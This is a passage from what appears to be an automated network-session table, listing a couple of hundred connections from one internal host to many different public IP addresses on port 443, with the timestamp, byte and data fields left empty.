                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10617192.168.2.1346976118.5.204.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10618192.168.2.1360196213.192.59.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10619192.168.2.1353598170.110.121.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10620192.168.2.1350064111.213.24.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10621192.168.2.133407657.78.15.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10622192.168.2.1358158205.61.184.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10623192.168.2.1339022116.80.178.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10624192.168.2.133685445.252.5.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10625192.168.2.135048851.140.160.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10626192.168.2.1337326152.131.184.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10627192.168.2.135542273.29.179.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10628192.168.2.134856683.141.93.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10629192.168.2.1357300211.132.12.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10630192.168.2.133360648.248.176.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10631192.168.2.1332908101.240.136.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10632192.168.2.1333566111.132.201.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10633192.168.2.134166620.53.22.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10634192.168.2.1355166206.167.98.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10635192.168.2.1337384148.196.245.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10636192.168.2.1359712206.89.102.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10637192.168.2.13473569.32.144.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10638192.168.2.1344820103.136.158.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10639192.168.2.135832620.162.182.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10640192.168.2.1336936142.24.240.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10641192.168.2.1351824130.125.95.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10642192.168.2.1344270181.170.145.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10643192.168.2.135240669.139.170.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10644192.168.2.1334800198.240.35.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10645192.168.2.1359076146.86.231.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10646192.168.2.133401451.44.236.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10647192.168.2.134630012.61.136.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10648192.168.2.134485445.72.85.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10649192.168.2.13355048.54.58.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10650192.168.2.136023434.93.40.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10651192.168.2.1354162216.36.219.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10652192.168.2.134517017.192.217.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10653192.168.2.1339674173.68.19.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10654192.168.2.135655272.169.79.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10655192.168.2.1342722120.76.125.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10656192.168.2.134391842.9.140.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10657192.168.2.1358546125.224.59.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10658192.168.2.133571472.210.97.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10659192.168.2.1333810140.210.25.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10660192.168.2.1348764108.13.160.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10661192.168.2.133817447.234.253.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10662192.168.2.135071284.159.109.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10663192.168.2.1350774148.111.160.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10664192.168.2.1334090188.19.74.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10665192.168.2.1336674167.93.183.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10666192.168.2.1354724207.136.25.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10667192.168.2.136022067.162.16.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10668192.168.2.134736625.235.111.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10669192.168.2.1342824111.218.137.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10670192.168.2.1355302161.1.6.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10671192.168.2.1343686110.169.133.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10672192.168.2.1342810183.85.72.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10673192.168.2.1346338192.22.246.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10674192.168.2.135528661.225.242.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10675192.168.2.135465477.154.203.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10676192.168.2.135790666.235.140.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10677192.168.2.13571549.20.31.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10678192.168.2.136087668.53.31.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10679192.168.2.134971872.127.132.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10680192.168.2.13379865.24.247.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10681192.168.2.134145617.183.113.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10682192.168.2.1357096108.143.30.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10683192.168.2.1333344172.140.199.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10684192.168.2.133564439.4.178.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10685192.168.2.134056472.48.158.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10686192.168.2.1350880125.142.213.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10687192.168.2.1353822104.44.108.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10688192.168.2.1334140177.198.97.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10689192.168.2.135081447.13.110.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10690192.168.2.134365062.203.218.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10691192.168.2.1336796147.155.37.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10692192.168.2.1336682168.146.29.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10693192.168.2.136033041.55.218.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10694192.168.2.1343846141.146.255.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10695192.168.2.1359920105.39.67.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10696192.168.2.1353554168.244.166.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10697192.168.2.1356998158.145.145.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10698192.168.2.135585076.153.103.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10699192.168.2.1338668143.96.67.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10700192.168.2.1358900104.39.163.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10701192.168.2.135930850.35.226.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10702192.168.2.1350412124.227.50.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10703192.168.2.134435689.118.107.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10704192.168.2.1336806135.62.160.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10705192.168.2.136041651.200.194.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10706192.168.2.1348972139.73.191.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10707192.168.2.1355764182.235.56.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10708192.168.2.1350850217.205.159.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10709192.168.2.1355644117.36.6.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10710192.168.2.1348006182.251.146.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10711192.168.2.134497677.19.225.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10712192.168.2.134215420.220.248.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10713192.168.2.1359850118.168.169.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10714192.168.2.133826252.65.219.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10715192.168.2.136062459.21.220.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10716192.168.2.1339740137.25.40.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10717192.168.2.134023247.173.187.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10718192.168.2.1337464212.59.182.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10719192.168.2.135415054.223.93.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10720192.168.2.1354394115.161.138.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10721192.168.2.133458285.116.108.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10722192.168.2.134348294.203.213.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10723192.168.2.134218287.164.76.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10724192.168.2.1352620113.225.152.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10725192.168.2.1345428192.210.131.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10726192.168.2.1354248185.209.6.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10727192.168.2.1336508117.182.13.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10728192.168.2.135726668.129.186.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10729192.168.2.1357396101.242.154.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10730192.168.2.1349380157.47.146.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10731192.168.2.1346298195.119.229.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10732192.168.2.1348818205.128.99.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10733192.168.2.134007694.3.120.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10734192.168.2.134264041.7.208.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10735192.168.2.1342502169.88.32.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10736192.168.2.135012498.214.215.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10737192.168.2.1352760195.43.238.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10738192.168.2.134615017.106.21.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10739192.168.2.1348712174.232.188.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10740192.168.2.1341306196.129.54.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10741192.168.2.134216437.152.55.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10742192.168.2.134140691.64.161.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10743192.168.2.135679639.117.102.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10744192.168.2.136058097.224.176.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10745192.168.2.133819053.11.238.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10746192.168.2.1354860121.97.36.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10747192.168.2.1357386205.85.161.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10748192.168.2.1353828112.193.74.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10749192.168.2.1344116167.74.131.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10750192.168.2.135074218.245.3.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10751192.168.2.135520841.204.178.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10752192.168.2.134364887.102.147.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10753192.168.2.1348038198.138.179.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10754192.168.2.1349746129.17.205.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10755192.168.2.1349210204.196.72.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10756192.168.2.134421018.253.121.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10757192.168.2.1338418121.142.208.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10758192.168.2.1338380165.51.44.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10759192.168.2.133981682.49.10.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10760192.168.2.1344662178.83.133.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10761192.168.2.1337440150.181.96.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10762192.168.2.1347176106.165.154.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10763192.168.2.135012058.136.49.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10764192.168.2.1341210189.83.163.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10765192.168.2.135193688.68.15.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10766192.168.2.134564853.194.75.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10767192.168.2.1355982190.192.117.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10768192.168.2.13593741.45.65.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10769192.168.2.134081643.22.78.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10770192.168.2.1354212110.206.111.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10771192.168.2.1350990115.162.160.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10772192.168.2.1359468174.143.228.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10773192.168.2.133688097.189.115.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10774192.168.2.1349056101.172.214.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10775192.168.2.135114863.207.33.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10776192.168.2.1338566106.185.215.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10777192.168.2.1359532112.71.221.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10778192.168.2.1351166116.218.94.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10779192.168.2.1359262114.108.198.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10780192.168.2.1345910115.139.144.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10781192.168.2.135677477.106.89.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10782192.168.2.1360350144.14.212.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10783192.168.2.1337104210.143.120.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10784192.168.2.1340468222.42.122.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10785192.168.2.134120071.237.127.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10786192.168.2.1350682115.211.247.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10787192.168.2.1351372133.234.120.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10788192.168.2.135304442.86.180.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10789192.168.2.1346966112.77.16.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10790192.168.2.133601439.123.189.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10791192.168.2.1344556210.39.174.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10792192.168.2.1336414190.137.197.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10793192.168.2.133445261.163.230.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10794192.168.2.1336512100.206.193.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10795192.168.2.1352226149.171.76.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10796192.168.2.1339278108.87.19.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10797192.168.2.1355958121.102.103.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10798192.168.2.134741276.138.206.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10799192.168.2.1357450129.70.149.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10800192.168.2.136002049.46.61.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10801192.168.2.1357594145.235.139.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10802192.168.2.133595883.0.59.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10803192.168.2.134692084.53.240.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10804192.168.2.1355682190.157.123.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10805192.168.2.134545038.200.113.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10806192.168.2.133918291.11.54.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10807192.168.2.13403365.55.12.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10808192.168.2.1359820112.61.166.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10809192.168.2.1336166116.163.6.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10810192.168.2.1337960133.35.198.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10811192.168.2.133543438.42.148.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10812192.168.2.1341958124.217.142.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10813192.168.2.1336216198.96.229.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10814192.168.2.1340604118.244.87.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10815192.168.2.1355758197.180.50.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10816192.168.2.134869260.120.219.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10817192.168.2.1342138151.162.197.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10818192.168.2.134208425.90.229.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10819192.168.2.1359600213.245.87.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10820192.168.2.1354238188.89.64.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10821192.168.2.1345672132.22.213.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10822192.168.2.1350138200.0.68.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10823192.168.2.1356662136.85.49.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10824192.168.2.1353752178.104.135.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10825192.168.2.134872227.219.212.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10826192.168.2.1345146136.181.75.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10827192.168.2.1335920208.181.12.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10828192.168.2.1345882216.15.194.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10829192.168.2.1347166183.216.4.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10830192.168.2.1348850192.69.113.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10831192.168.2.133307851.210.59.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10832192.168.2.1340986165.54.154.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10833192.168.2.1359784118.188.20.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10834192.168.2.1356750166.29.229.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10835192.168.2.134923444.82.182.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10836192.168.2.1335162150.225.117.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10837192.168.2.135308240.189.3.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10838192.168.2.13402268.77.218.9443
